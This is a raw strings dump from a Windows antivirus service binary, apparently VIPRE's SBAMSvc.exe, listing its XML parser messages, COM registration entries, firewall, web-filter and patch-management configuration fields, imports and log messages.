ENTITIES attribute %s reference an unknown entity "%s"
ENTITIES attribute %s reference an entity "%s" of wrong type
NOTATION attribute %s reference an unknown notation "%s"
standalone: %s on %s value had to be normalized based on external subset declaration
Syntax of default value for attribute %s of %s is not valid
ID attribute %s of %s is not valid must be #IMPLIED or #REQUIRED
Element %s has %d ID attribute defined in the internal subset : %s
Element %s has %d ID attribute defined in the external subset : %s
Element %s has ID attributes defined in the internal and external subset : %s
Default value "%s" for attribute %s of %s is not among the enumerated set
Definition of %s has duplicate references of %s
Definition of %s has duplicate references of %s:%s
Definition of %s has duplicate references to %s
Definition of %s has duplicate references to %s:%s
No declaration for attribute %s of element %s
Syntax of value for attribute %s of %s is not valid
Value for attribute %s of %s is different from default "%s"
Value "%s" for attribute %s of %s is not a declared Notation
Value "%s" for attribute %s of %s is not among the enumerated notations
Value "%s" for attribute %s of %s is not among the enumerated set
Value for attribute %s of %s must be "%s"
No declaration for attribute xmlns:%s of element %s
No declaration for attribute xmlns of element %s
Syntax of value for attribute xmlns:%s of %s is not valid
Syntax of value for attribute xmlns of %s is not valid
Value for attribute xmlns:%s of %s is different from default "%s"
Value for attribute xmlns of %s is different from default "%s"
Value "%s" for attribute xmlns:%s of %s is not a declared Notation
Value "%s" for attribute xmlns of %s is not a declared Notation
Value "%s" for attribute xmlns:%s of %s is not among the enumerated notations
Value "%s" for attribute xmlns of %s is not among the enumerated notations
Value "%s" for attribute xmlns:%s of %s is not among the enumerated set
Value "%s" for attribute xmlns of %s is not among the enumerated set
Value for attribute xmlns:%s of %s must be "%s"
Value for attribute xmlns of %s must be "%s"
Element %s content does not follow the DTD, expecting %s, got %s
Element content does not follow the DTD, expecting %s, got %s
No declaration for element %s
Element %s was declared EMPTY this one has content
Element %s was declared #PCDATA but contains non text nodes
Element %s is not declared in %s list of possible children
standalone: %s declared in the external subset contains white spaces nodes
Element %s does not carry attribute %s
Element %s does not carry attribute %s:%s
Element %s required attribute %s:%s has no prefix
Element %s required attribute %s:%s has different prefix
Element %s namespace name for default namespace does not match the DTD
Element %s namespace name for %s does not match the DTD
root and DTD name do not match '%s' and '%s'
attribute %s line %d references an unknown ID "%s"
IDREF attribute %s references an unknown ID "%s"
IDREFS attribute %s references an unknown ID "%s"
xmlValidateAttributeCallback(%s): internal error
attribute %s: could not find decl for element %s
NOTATION attribute %s declared for EMPTY element %s
%s:%d:
Entity: line %d:
element %s:
%d;
%X;
:/?_.#&;=
%s: out of memory
Entity(%s) document marked standalone but requires external subset
Failure to process entity %s
Entity(%s) already defined in the internal subset
Entity(%s) already defined in the external subset
SAX.xmlSAX2EntityDecl(%s) called while not in subset
SAX.xmlSAX2AttributeDecl(%s) called while not in subset
SAX.xmlSAX2ElementDecl(%s) called while not in subset
SAX.xmlSAX2NotationDecl(%s) externalID or PublicID missing
SAX.xmlSAX2NotationDecl(%s) called while not in subset
SAX.xmlSAX2UnparsedEntityDecl(%s) called while not in subset
invalid namespace declaration '%s'
Avoid attribute ending with ':' like '%s'
xmlns: %s not a valid URI
xmlns: URI %s is not absolute
Empty namespace name for prefix %s
xmlns:%s: %s not a valid URI
xmlns:%s: URI %s is not absolute
Namespace prefix %s of attribute %s is not defined
Attribute %s in %s redefined
xml:id : attribute value %s is not an NCName
standalone: attribute %s on %s defaulted from external subset
Namespace prefix %s is not defined
Namespace prefix %s was not found
Attempt to load network entity %s
Operation timed out
Broken pipe
Operation not permitted
Inappropriate I/O control operation
Not supported
Operation in progress
Operation canceled
creating HTTP output context
xmlIOHTTPWrite: %s
%s '%s'.
xmlIOHTTPCloseWrite: %s '%s' %s '%s'.
failed. HTTP return code:
xmlIOHTTPCloseWrite: HTTP '%s' of %d %s
'%s' %s %d
failed to load HTTP resource "%s"
failed to load HTTP resource
Unknown encoding %s
xmlRegisterCharEncodingHandler: Too many handler registered, see %s
0xX 0xX 0xX 0xX
input conversion failed due to input error, bytes %s
output conversion failed due to conv error, bytes %s
Attribute %s:%s redefined
conditional section INCLUDE or IGNORE keyword expected
Pbm popping %d NS
Excessive depth in document: %d use XML_PARSE_HUGE option
Popping input %d
%s(%d):
Pushing input %d : %.30s
xmlParseCharRef: invalid xmlChar value %d
xmlParseStringCharRef: invalid xmlChar value %d
new blanks wrapper for entity: %s
PEReference: %s
PEReference: %%%s; not found
PEReference: %s is not a parameter entity
Name %s is not XML Namespace compliant
EntityValue: '%c' forbidden except for entities references
PCDATA invalid Char value %d
xmlParseComment: invalid xmlChar value %d
colon are forbidden from PI names '%s'
Catalog PI syntax error: %s
colon are forbidden from notation names '%s'
colon are forbidden from entities names '%s'
Invalid URI: %s
xmlParseEntityDecl: entity %s not terminated
standalone: attribute notation value token %s duplicated
standalone: attribute enumeration value token %s duplicated
xmlParseElementChildrenContentDecl : depth %d too deep, use XML_PARSE_HUGE
xmlParseElementChildrenContentDecl : '%c' expected
xmlParseElementContentDecl : %s '(' expected
Entity '%s' failed to parse
Entity '%s' not defined
Entity reference to unparsed entity %s
Attribute references external entity '%s'
'<' in entity '%s' is not allowed in attributes values
Attempt to reference the parameter entity '%s'
Internal: %%%s; is not a parameter entity
Reading %s entity content input
xmlLoadEntityContent: invalid char value %d
%%%s; is not a parameter entity
Specification mandate value for attribute %s
Malformed value for xml:lang : %s
Invalid value "%s" for xml:space : "default" or "preserve" expected
Opening and ending tag mismatch: %s line %d and %s
Failed to parse QName '%s'
Failed to parse QName '%s:'
Failed to parse QName '%s:%s:'
xmlns: '%s' is not a valid URI
hXXp://VVV.w3.org/2000/xmlns/
xmlns:%s: Empty XML namespace is not allowed
xmlns:%s: '%s' is not a valid URI
Namespace prefix %s for %s on %s is not defined
Namespaced Attribute %s in '%s' redefined
Namespace prefix %s on %s is not defined
Couldn't find end of Start Tag %s line %d
Premature end of data in tag %s line %d
Unsupported version '%s'
Free catalog entry %s
%s entry lacks '%s'
Found %s: '%s' '%s'
Found %s: '%s'
%s entry '%s' broken ?: %s
Invalid value for prefer: '%s'
Failed to parse catalog %s
%d Parsing catalog %s
File %s is not an XML Catalog
Found %s in file hash
%s not found in file hash
%s added to file hash
Detected recursion in catalog %s
Found system match %s, using %s
Using rewriting rule %s
Trying system delegate %s
Found public match %s
Trying public delegate %s
Found URI match %s
Trying URI delegate %s
Public URN ID %s expanded to NULL
Public URN ID expanded to %s
System URN ID %s expanded to NULL
System URN ID expanded to %s
URN ID %s expanded to NULL
URN ID expanded to %s
Resolve: pubID %s sysID %s
Resolve: pubID %s
Resolve: sysID %s
Resolve URI %s
libxml2.dll
Adding document catalog %s
Local Resolve: pubID %s sysID %s
Local Resolve: pubID %s
Local Resolve: sysID %s
failed to compile: %s
creating execution context
ftp_proxy
FTP_PROXY
ftp_proxy_user
ftp_proxy_password
allocating FTP context
USER %s
PASS anonymous@
PASS %s
SITE %s
USER anonymous@%s
USER %s@%s
FTP server asking for ACCNT on anonymous
%u,%u,%u,%u,%u,%u
PORT %d,%d,%d,%d,%d,%d
RETR %s
http_proxy
HTTP_PROXY
HTTP/
error connecting to HTTP server
Not a valid HTTP URI
%s hXXp://%s:%d%s
%s hXXp://%s%s
%s %s
HTTP/1.0
Host: %s
Host: %s:%d
Content-Type: %s
Content-Length: %d
Invalid operand
Missing closing curly brace
hXXp://relaxng.org/ns/structure/1.0
hXXp://VVV.w3.org/2001/XMLSchema
SupplementalMathematicalOperators
MathematicalOperators
hXXp://VVV.w3.org/2001/XMLSchema-instance
%d.%d.%d.%d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
FenumOperation
AllowedOperations
MonitoredURL
HttpServerConfig\HttpServerConfig.cpp
HttpServerConfig
18446744073709551615
URL="
-2147483648
2147483647
enumOperation="
Password
Port
4294967295
4.0.0
LanGuardConfig\LanGuardConfig.cpp
Port="
Password="
ProductKey
Web_Alerts
port
fileurl
passwordHistory
minimumPasswordAge
maximumPasswordAge
minimumPasswordLength
transport
LoginShell
BadPasswordsCount
PasswordAge
passworded
PrimaryKey
udp_ports
ports
transports
iswindows
Importance
SystemUpdateScanResults\SystemUpdateScanResults.cpp
Importance="
</iswindows>
<iswindows>
PrimaryKey="
passworded="
</PasswordAge>
<PasswordAge>
</BadPasswordsCount>
<BadPasswordsCount>
</LoginShell>
<LoginShell>
transport="
</minimumPasswordLength>
<minimumPasswordLength>
</maximumPasswordAge>
<maximumPasswordAge>
</minimumPasswordAge>
<minimumPasswordAge>
</passwordHistory>
<passwordHistory>
</url>
<url>
</fileurl>
<fileurl>
</Url>
<Url>
ProductKey="
RegistrationKey
RegistrationKey="
Telemetry\Telemetry.cpp
LanGuardToolCfg_Updates\LanGuardToolCfg_Updates.cpp
LanGuardResults\LanGuardResults.cpp
LogToWindowsEventLog
LogToWindowsEventLog="
ServiceConfig\ServiceConfig.cpp
ScanConfig\ScanConfig.cpp
SendFileURL
ThreatNetQueryURL
ThreatNetURL
TelemetryURL
TelemetryURL="
ThreatNetURL="
ThreatNetQueryURL="
SendFileURL="
ThreatNetConfig\ThreatNetConfig.cpp
ThreatNetResponse\ThreatNetResponse.cpp
ntosExport
ntdllExport
reportonly
authorURL
RegKey
MsgID
ThreatNetTransfer\ThreatNetTransfer.cpp
MsgID="
RegKey="
</authorURL>
<authorURL>
reportonly="
ntdllExport="
ntosExport="
AutoGetURL
UpdateURL
RegistrationURL
RegistrationURL="
UpdateURL="
AutoGetURL="
RegistrationConfig\RegistrationConfig.cpp
BaseURL
ThreatDefinitionsConfig\ThreatDefinitionsConfig.cpp
BaseURL="
NVPairs\NVPairs.cpp
APEvent\APEvent.cpp
ScanResults\ScanResults.cpp
QuarantineFile\QuarantineFile.cpp
ProcessList\ProcessList.cpp
SoftwareUpdateConfig\SoftwareUpdateConfig.cpp
BadUrl
SocialWatchHistory\SocialWatchHistory.cpp
Url="
</BadUrl>
<BadUrl>
WindowsLiveMailClientEnabled
BadUrlActionEnum
BadUrlCheckingEnabled
BadUrlReplacementText
CloseEmailWindowMsg
SMTPErrorString
SMTPErrorString="
CloseEmailWindowMsg="
BadUrlReplacementText="
BadUrlCheckingEnabled="
BadUrlActionEnum="
WindowsLiveMailClientEnabled="
EmailAVConfig\EmailAVConfig.cpp
QuarantineRecord\QuarantineRecord.cpp
WSCConfig\WSCConfig.cpp
APConfig\APConfig.cpp
BadUrls
FWWebFilterHourlyStats
FWWebFilterHourlyStats\FWWebFilterHourlyStats.cpp
FWWebFilterStats
UserKnownBadUrl
BadUrlBlockingException
UserKnownBadUrls
BadUrlBlockingExceptions
Ports
WebFilterStatsFreq
LogWebFilterEvents
LogWebFilterEvents="
WebFilterStatsFreq="
WebFilterConfig\WebFilterConfig.cpp
WebConfig
BadUrlRule
WebFilterEvent
BadUrlRule="
FWFilterHourlyStats
FWFilterHourlyStats\FWFilterHourlyStats.cpp
PortScanIntrusions
FWIDSHourlyStats
FWIDSHourlyStats\FWIDSHourlyStats.cpp
PortScanIntrusions="
TcpOutPackets
TcpOutBytes
TcpInPackets
TcpInBytes
UdpOutPackets
UdpOutBytes
UdpInPackets
UdpInBytes
FWNetworkHourlyStats
FWNetworkHourlyStats\FWNetworkHourlyStats.cpp
UdpInBytes="
UdpInPackets="
UdpOutBytes="
UdpOutPackets="
TcpInBytes="
TcpInPackets="
TcpOutBytes="
TcpOutPackets="
RemotePorts
LocalPorts
PortEnd
PortStart
PortType
PortScanLog
PortScanAllow
LogPacketsToUnopenedPorts
LogPortScans
LogPortScans="
LogPacketsToUnopenedPorts="
FirewallConfig\FirewallConfig.cpp
PortScanAllow="
PortScanLog="
PortType="
PortStart="
PortEnd="
Tcp_Udp_RemotePort
Tcp_Udp_LocalPort
PacketToUnopenedPortEvent
FWEvent\FWEvent.cpp
Tcp_Udp_LocalPort="
Tcp_Udp_RemotePort="
Msg="
FWIDSRules\FWIDSRules.cpp
HipsConfig\HipsConfig.cpp
HipsHourlyStats
HipsHourlyStats\HipsHourlyStats.cpp
ScanResultsSummary\ScanResultsSummary.cpp
Operation
d:\projects\workspace\sdk-sdk\src\bin\Release\SBAMSvc.pdb
SpursDownload.dll
SBTE.dll
SBAPSetReportCallbackEx
SBAPSetReportCallback
sbap.dll
SBArva.dll
VERSION.dll
WinHttpSendRequest
WinHttpCloseHandle
WinHttpSetStatusCallback
WinHttpCrackUrl
WinHttpOpen
WinHttpConnect
WinHttpWriteData
WinHttpOpenRequest
WinHttpReadData
WinHttpReceiveResponse
WinHttpSetCredentials
WinHttpQueryAuthSchemes
WinHttpQueryDataAvailable
WinHttpQueryHeaders
WINHTTP.dll
WinHttpSetTimeouts
WINMM.dll
PSAPI.DLL
SbHips.dll
WS2_32.dll
msi.dll
GetExtendedTcpTable
GetExtendedUdpTable
IPHLPAPI.DLL
GetProcessHeap
SetThreadExecutionState
KERNEL32.dll
MsgWaitForMultipleObjects
USER32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
RegCreateKeyW
CryptDestroyKey
CryptDeriveKey
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
sfc.dll
pdh.dll
UrlGetPartW
SHLWAPI.dll
HttpAddUrl
HttpInitialize
HttpCreateHttpHandle
HttpReceiveHttpRequest
HttpSendHttpResponse
HttpReceiveRequestEntityBody
HttpRemoveUrl
HTTPAPI.dll
USERENV.dll
WinHttpSetOption
GetCPInfo
PeekNamedPipe
.?AV?$CAtlExeModuleT@VCSBAMSvcModule@@@ATL@@
.PA_W
.?AVISBWebFilterEvents@@
.?AV?$CProxy_ISBWebFilterEvents@VCSBWebFilter@@@@
.?AV?$IConnectionPointImplMT@VCSBWebFilter@@$1?_GUID_eecd4897_dd51_476d_9913_b9c808885f03@@3U__s_GUID@@BVCComDynamicUnkArray@ATL@@@ATL@@
.?AV?$CComClassFactorySingleton@VCSBWebFilter@@@ATL@@
.?AV?$CComObject@VCSBWebFilter@@@ATL@@
.?AVCSBWebFilter@@
.?AV?$CComCoClass@VCSBWebFilter@@$1?CLSID_SBWebFilter@@3U_GUID@@B@ATL@@
.?AV?$IConnectionPointContainerImpl@VCSBWebFilter@@@ATL@@
.?AUISBWebFilter@@
.?AV?$CComContainedObject@VCSBWebFilter@@@ATL@@
.?AV?$CComObjectCached@VCSBWebFilter@@@ATL@@
.?AV?$CComAggObject@VCSBWebFilter@@@ATL@@
.?AV?$CComObjectNoLock@V?$CComClassFactorySingleton@VCSBWebFilter@@@ATL@@@ATL@@
.?AVCHttpServerConfig@SbXmlHttpServerConfig@@
.?AVCMonitoredURL@SbXmlHttpServerConfig@@
.?AVCAllowedOperations@SbXmlHttpServerConfig@@
.?AVCWeb_Alerts@SbXmlSystemUpdateScanResults@@
.?AVCudp_ports@SbXmlSystemUpdateScanResults@@
.?AVCudp_ports_port@SbXmlSystemUpdateScanResults@@
.?AVCports@SbXmlSystemUpdateScanResults@@
.?AVCport@SbXmlSystemUpdateScanResults@@
.?AVCtransports@SbXmlSystemUpdateScanResults@@
.?AVCBadUrls@SbXmlEmailAvEvent@@
.?AVCBadUrls@SbXmlBadUrls@@
.?AVCFWWebFilterHourlyStats@SbXmlFWWebFilterHourlyStats@@
.?AVCFWWebFilterStats@SbXmlFWWebFilterHourlyStats@@
.?AVCWebConfig@SbXmlWebFilterConfig@@
.?AVCUserKnownBadUrls@SbXmlWebFilterConfig@@
.?AVCUserKnownBadUrl@SbXmlWebFilterConfig@@
.?AVCBadUrlBlockingExceptions@SbXmlWebFilterConfig@@
.?AVCBadUrlBlockingException@SbXmlWebFilterConfig@@
.?AVCPorts@SbXmlWebFilterConfig@@
.?AVCPort@SbXmlWebFilterConfig@@
.?AVCWebFilterEvent@SbXmlWebFilterEvent@@
.?AVCBadUrl@SbXmlWebFilterEvent@@
.?AVCFWFilterHourlyStats@SbXmlFWFilterHourlyStats@@
.?AVCFWFilterStats@SbXmlFWFilterHourlyStats@@
.?AVCFWIDSHourlyStats@SbXmlFWIDSHourlyStats@@
.?AVCFWIDSStats@SbXmlFWIDSHourlyStats@@
.?AVCFWNetworkHourlyStats@SbXmlFWNetworkHourlyStats@@
.?AVCFWNetworkStats@SbXmlFWNetworkHourlyStats@@
.?AVCRemotePorts@SbXmlFirewallConfig@@
.?AVCLocalPorts@SbXmlFirewallConfig@@
.?AVCPort@SbXmlFirewallConfig@@
.?AVCRemotePorts@SbXmlFWEvent@@
.?AVCLocalPorts@SbXmlFWEvent@@
.?AVCPort@SbXmlFWEvent@@
.?AVCPacketToUnopenedPortEvent@SbXmlFWEvent@@
.?AVCHipsHourlyStats@SbXmlHipsHourlyStats@@
.?AVCHipsStats@SbXmlHipsHourlyStats@@
'SBAMSvc.EXE'
SBAMSvc.SBScanControl.1 = s 'SBScanControl Class'
CLSID = s '{EC88394A-429C-4DDB-91EA-570E938B79DF}'
SBAMSvc.SBScanControl = s 'SBScanControl Class'
CurVer = s 'SBAMSvc.SBScanControl.1'
ForceRemove {EC88394A-429C-4DDB-91EA-570E938B79DF} = s 'SBScanControl Class'
ProgID = s 'SBAMSvc.SBScanControl.1'
VersionIndependentProgID = s 'SBAMSvc.SBScanControl'
'TypeLib' = s '{78FA6088-B9C6-4749-833B-4421E29E84E7}'
SBAMSvc.SBQuarantine.1 = s 'SBQuarantine Class'
CLSID = s '{8B404080-4780-4199-92ED-B05B61C657EE}'
SBAMSvc.SBQuarantine = s 'SBQuarantine Class'
CurVer = s 'SBAMSvc.SBQuarantine.1'
ForceRemove {8B404080-4780-4199-92ED-B05B61C657EE} = s 'SBQuarantine Class'
ProgID = s 'SBAMSvc.SBQuarantine.1'
VersionIndependentProgID = s 'SBAMSvc.SBQuarantine'
SBAMSvc.SBLogger.1 = s 'SBLogger Class'
CLSID = s '{24CEBDF0-E1CC-4933-893E-F1D1A4078D97}'
SBAMSvc.SBLogger = s 'SBLogger Class'
CurVer = s 'SBAMSvc.SBLogger.1'
ForceRemove {24CEBDF0-E1CC-4933-893E-F1D1A4078D97} = s 'SBLogger Class'
ProgID = s 'SBAMSvc.SBLogger.1'
VersionIndependentProgID = s 'SBAMSvc.SBLogger'
SBAMSvc.SBService.1 = s 'SBService Class'
CLSID = s '{FE7E09CE-BBF4-4698-8BC1-37C9002DAA43}'
SBAMSvc.SBService = s 'SBService Class'
CurVer = s 'SBAMSvc.SBService.1'
ForceRemove {FE7E09CE-BBF4-4698-8BC1-37C9002DAA43} = s 'SBService Class'
ProgID = s 'SBAMSvc.SBService.1'
VersionIndependentProgID = s 'SBAMSvc.SBService'
SBAMSvc.SBSoftwareUpdates.1 = s 'SBSoftwareUpdates Class'
CLSID = s '{2017CFB9-B2A2-4A98-BD9B-0D9D980B2193}'
SBAMSvc.SBSoftwareUpdates = s 'SBSoftwareUpdates Class'
CurVer = s 'SBAMSvc.SBSoftwareUpdates.1'
ForceRemove {2017CFB9-B2A2-4A98-BD9B-0D9D980B2193} = s 'SBSoftwareUpdates Class'
ProgID = s 'SBAMSvc.SBSoftwareUpdates.1'
VersionIndependentProgID = s 'SBAMSvc.SBSoftwareUpdates'
SBAMSvc.SBWSC.1 = s 'SBWSC Class'
CLSID = s '{157EAC4E-6E3C-419A-BDCB-546345690DEB}'
SBAMSvc.SBWSC = s 'SBWSC Class'
CurVer = s 'SBAMSvc.SBWSC.1'
ForceRemove {157EAC4E-6E3C-419A-BDCB-546345690DEB} = s 'SBWSC Class'
ProgID = s 'SBAMSvc.SBWSC.1'
VersionIndependentProgID = s 'SBAMSvc.SBWSC'
SBAMSvc.SBVipre.1 = s 'SBVipre Class'
CLSID = s '{C4F66612-D788-4F33-92AF-6DAC6FC80C35}'
SBAMSvc.SBVipre = s 'SBVipre Class'
CurVer = s 'SBAMSvc.SBVipre.1'
ForceRemove {C4F66612-D788-4F33-92AF-6DAC6FC80C35} = s 'SBVipre Class'
ProgID = s 'SBAMSvc.SBVipre.1'
VersionIndependentProgID = s 'SBAMSvc.SBVipre'
SBAMSvc.SBThreatDefinitions.1 = s 'SBThreatDefinitions Class'
CLSID = s '{05191E1B-B7D8-42DD-A52A-88011228A14F}'
SBAMSvc.SBThreatDefinitions = s 'SBThreatDefinitions Class'
CurVer = s 'SBAMSvc.SBThreatDefinitions.1'
ForceRemove {05191E1B-B7D8-42DD-A52A-88011228A14F} = s 'SBThreatDefinitions Class'
ProgID = s 'SBAMSvc.SBThreatDefinitions.1'
VersionIndependentProgID = s 'SBAMSvc.SBThreatDefinitions'
SBAMSvc.SBActiveProtection.1 = s 'SBActiveProtection Class'
CLSID = s '{5F6DA338-15AC-4927-BC8B-B8C52EEEC9EB}'
SBAMSvc.SBActiveProtection = s 'SBActiveProtection Class'
CurVer = s 'SBAMSvc.SBActiveProtection.1'
ForceRemove {5F6DA338-15AC-4927-BC8B-B8C52EEEC9EB} = s 'SBActiveProtection Class'
ProgID = s 'SBAMSvc.SBActiveProtection.1'
VersionIndependentProgID = s 'SBAMSvc.SBActiveProtection'
SBAMSvc.SBRegistration.1 = s 'SBRegistration Class'
CLSID = s '{15C44439-2DE8-4217-B61D-146E347199A6}'
SBAMSvc.SBRegistration = s 'SBRegistration Class'
CurVer = s 'SBAMSvc.SBRegistration.1'
ForceRemove {15C44439-2DE8-4217-B61D-146E347199A6} = s 'SBRegistration Class'
ProgID = s 'SBAMSvc.SBRegistration.1'
VersionIndependentProgID = s 'SBAMSvc.SBRegistration'
SBAMSvc.SBEmailAV.1 = s 'SBEmailAV Class'
CLSID = s '{DB7777B6-5C67-4C49-BD93-EE9AE1F03085}'
SBAMSvc.SBEmailAV = s 'SBEmailAV Class'
CurVer = s 'SBAMSvc.SBEmailAV.1'
ForceRemove {DB7777B6-5C67-4C49-BD93-EE9AE1F03085} = s 'SBEmailAV Class'
ProgID = s 'SBAMSvc.SBEmailAV.1'
VersionIndependentProgID = s 'SBAMSvc.SBEmailAV'
SBAMSvc.SBWebFilter.1 = s 'SBWebFilter Class'
CLSID = s '{2BAA4D68-DB29-40DF-806A-B392073A7EF2}'
SBAMSvc.SBWebFilter = s 'SBWebFilter Class'
CurVer = s 'SBAMSvc.SBWebFilter.1'
ForceRemove {2BAA4D68-DB29-40DF-806A-B392073A7EF2} = s 'SBWebFilter Class'
ProgID = s 'SBAMSvc.SBWebFilter.1'
VersionIndependentProgID = s 'SBAMSvc.SBWebFilter'
SBAMSvc.SBFirewall.1 = s 'SBFirewall Class'
CLSID = s '{F2C6E6BB-C773-4941-B61B-3CBEFD46F64D}'
SBAMSvc.SBFirewall = s 'SBFirewall Class'
CurVer = s 'SBAMSvc.SBFirewall.1'
ForceRemove {F2C6E6BB-C773-4941-B61B-3CBEFD46F64D} = s 'SBFirewall Class'
ProgID = s 'SBAMSvc.SBFirewall.1'
VersionIndependentProgID = s 'SBAMSvc.SBFirewall'
SBAMSvc.SBHIPS.1 = s 'SBHIPS Class'
CLSID = s '{4BB09156-340D-491A-B86B-A0C2A7BA26A9}'
SBAMSvc.SBHIPS = s 'SBHIPS Class'
CurVer = s 'SBAMSvc.SBHIPS.1'
ForceRemove {4BB09156-340D-491A-B86B-A0C2A7BA26A9} = s 'SBHIPS Class'
ProgID = s 'SBAMSvc.SBHIPS.1'
VersionIndependentProgID = s 'SBAMSvc.SBHIPS'
SBAMSvc.SBLanGuard.1 = s 'SBLanGuard Class'
CLSID = s '{85300480-82AD-4892-9043-35D62E097D66}'
SBAMSvc.SBLanGuard = s 'SBLanGuard Class'
CurVer = s 'SBAMSvc.SBLanGuard.1'
ForceRemove {85300480-82AD-4892-9043-35D62E097D66} = s 'SBLanGuard Class'
ProgID = s 'SBAMSvc.SBLanGuard.1'
VersionIndependentProgID = s 'SBAMSvc.SBLanGuard'
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
3VIPREHttpServer
Failed in starting process commandLine<%s>
WaitForSingleObject returned WAIT_ABANDONED commandLine<%s>
WaitForSingleObject returned WAIT_TIMEOUT commandLine<%s>
fullCmd<%s> waitTime<%d> mils
Failed to open Registry key<%s>, regRc<%u>.
Failed to read registry key <%s\%s>, regRc<%u>.
HttpServer Thread stopped.
Couldn't terminate HttpServer thread.
SBHttpServer
CSBHttpServerImpl::StopThread
Couldn't stop HttpServer thread. Attempting to Terminate Thread.
CSBHttpServerImpl::StopController
HttpServer controller stopped.
127.0.0.1
Config file may not exist or is corrupted. Creating default config file for the HttpServer controller.
HttpServer Thread quit event set.
Unknown return status from WaitForMultipleObjects() [%u].
Waiting for HttpServer events.
Registering %s failed with %lu
hXXp:// :53911/WOT/Query/
CSBHttpServerImpl::HttpServerThread
HttpInitialize failed with %lu
HttpServer thread succesfully started
Failed starting HttpServer thread.
The HttpServer thread is already running.
CSBHttpServerImpl::StartThread
Starting HttpServer thread.
the HttpServer config file
CSBHttpServerImpl::SaveConfigToDisk
HttpServerConfig.xml
CSBHttpServerImpl::GetConfigObjectFromDisk
Couldn't start HttpServer controller's thread.
HttpServer thread started successfully.
HttpServerConfig not loaded successfully. Using default values, changes not persisted.
HttpServerConfig Loaded successfully.
HttpServer thread already started, exiting StartController.
CSBHttpServerImpl::StartController
Entering HttpServer module StartController.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
CSBLanGuard::StopAllRemediationOperations
CSBLanGuard::GetWindowsUpdateSettings
CSBLanGuard::SetWindowsUpdateSettings
Setting the this pointer for the LanGuard CoClass [%x].
An error occurred attempting to get the Windows Update ScheduledInstallationTime setting hr=[%x].
An error occurred attempting to get the Windows Update ScheduledInstallationDay setting hr=[%x].
An error occurred attempting to get the Windows Update ReadOnly setting hr=[%x].
An error occurred attempting to get the Windows Update Required setting hr=[%x].
An error occurred attempting to get the Windows Update notification level setting hr=[%x].
An error occurred attempting to get the Windows Update settings hr=[%x].
An error occurred attempting to set the Windows Update ServiceEnabled setting hr=[%x].
CSBLanGuardImpl::GetWindowsUpdateSettings
Unable to CoCreateInstance for AutomaticUpdateSettings, hr=[%x].
Enabled the Windows Update service.
An error occurred attempting to enable the Windows Update service hr=[%x].
Unable to set Windows Updates settings because they are ReadOnly. This may be caused by a GroupPolicy setting that prevents this user from changing the settings.
An error occurred attempting to save the current Windows Update settings hr=[%x].
An error occurred attempting to set the Windows Update ScheduledInstallationTime setting to [%d], hr=[%x].
An error occurred attempting to set the Windows Update ScheduledInstallationDay setting to [%d], hr=[%x].
An error occurred attempting to set the Windows Update notification level setting to [%d], hr=[%x].
An error occurred attempting to read the current Windows Update setting hr=[%x].
CSBLanGuardImpl::SetWindowsUpdateSettings
IDispatch error #%d
Adding System Update schedule item. The last scan was run on (%s), the ScanInterval is [%d] hours.
Adding System Update schedule item. The last definition update check was run on (%s), the UpdateInterval is [%d] hours.
Unable to locate an item in the HiddenUpdates collection while trying to remove an item from the HiddenUpdates collection. The update ID (%s) may not be removed from the Hidden Updates collection and may NOT be show to the user.
Found Update name (%s), with matching Digest of (%s).
Last successful scan results path is <%s>.
An error occurred attempting to initialize LanGuard; com error(0x%x) : (%s)
An error occurred attempting to initialize LanGuard; return code (0x%x)
Got current thread state (%s) and reboot required is (%s).
Error creating the MantleServer object; com error:<%x> (%s). Unable to communicate with the LanGuard process.
Failed connecting to the MantleServer object; com error:<%x> (%s)
Error creating the MantleServer object; com error: <0x%x> (%s). Unable to communicate with the LanGuard process.
We were unable to Create an instance of the LanGuard interface and the result returned was [0x%x]. We are NOT connected to the LanGuard interface.
An error occurred attempting to StopAllScans; com error(0x%x) : (%s)
An error occurred attempting to StopAllRemediationOperations; com error(0x%x) : (%s)
Stopped all LanGuard RemediationOperations successfully.
CSBLanGuardImpl::StopAllRemediationOperations
Unable to stop all LanGuard RemediationOperations. This may be because there are no RemediationOperations currently running.
An error occurred attempting to configure the System Update proxy settings; com error(0x%x) : (%s)
The System Update ProxySettings are (%s) in the configuration file. The LanGuard system will be configured to use (%s) Proxy settings.
An error occurred attempting to ResetProxyToAutomatic; return code (0x%x)
An error occurred attempting to SetProxyServer; return code (0x%x)
An error occurred attempting to SetProxyCredentials; return code (0x%x)
Couldn't find the product element for this patch (%s) in the scan results. Unable to populate the telemetry data.
DownloadFileUrl
Found the product element for this patch (%s) in the scan results. Will populate the telemetry data.
An error occurred attempting to get Languard Build; com error(0x%x) : (%s)
Languard version is <%s>, build is <%s>
MantleServer build returned: (%s)
ERROR: error geting the MantleServer Build; hr: (%x)
An error occurred attempting to get Languard Version; com error(0x%x) : (%s)
MantleServer version returned: (%s)
ERROR: error geting the MantleServer Version; hr: (%x)
Could not create volatile registry key after update.
Created volatile registry key after update.
Languard Definitions version is <%s>, install date is <%s>
An error occurred trying to read the version file (%s) for System Update definitions version.
\toolcfg_updates.xml
MantleServer GetDataDir returned: (%s)
ERROR: error geting the Languard DataDir; hr: (%x)
An error [%d] (%s) occurred de-serializing System Update Scan from the file <%s>. Unable to determine if a postreboot scan is required.
Failed to serialize %s.
Error serializing %s--%s
Bad argument; pXmlBuf is NULL. %s.
Failed to deserialize %s.
Error deserializing %s--%s
While trying to write LanGuard Config File (%s), received error.
Unable change attributes on the config file: %s
LanGuardConfig.xml
While trying to write a default LanGuard Config File (%s), received error.
While reading the LanGuard Config File (%s). Config file may not exist or is corrupted. Creating default config file for the LanGuard controller.
There are [%u] total updates, [%u] hidden updates and [%u] critical updates.
Update name (%s) is a Microsoft Update. Skipping
The LMX Error [%d] occurred trying to add a blank Update item to the Updates collection. LMX errors are listed in ..\vendor\LMX\include\lmxinternals.h
Added Update name (%s), with Importance of (%s).
Adding [%d] Updates for Product name (%s).
Added dateTimeStamp start: (%s) and end: (%s).
Adding Updates for [%d] Products to the Updates collection.
